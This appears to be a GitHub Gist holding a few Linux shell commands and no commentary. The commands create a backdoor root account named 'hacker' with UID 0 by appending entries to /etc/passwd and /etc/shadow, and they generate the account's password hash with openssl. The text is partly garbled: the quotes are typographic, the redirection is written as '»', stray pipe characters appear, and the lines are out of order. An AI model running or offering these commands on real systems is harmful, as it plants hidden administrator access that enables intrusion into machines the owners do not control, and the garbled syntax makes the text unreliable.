Created
October 19, 2016 00:49
-
-
Save leveled/efe9e083b2ae5fcbcd81c688dabf9d40 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo “hacker:x:0:0:A friend:/:/bin/bash” » /etc/passwd | |
/etc/shadow root@localhost:~# openssl passwd -1 -salt xyz freeworld $1$xyz$A1YZaeEjVGoBzmQpTTBFv1 | |
echo “hacker:$1$xyz$A1YZaeEjVGoBzmQpTTBFv1:13529:0:99999:7:::” » |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment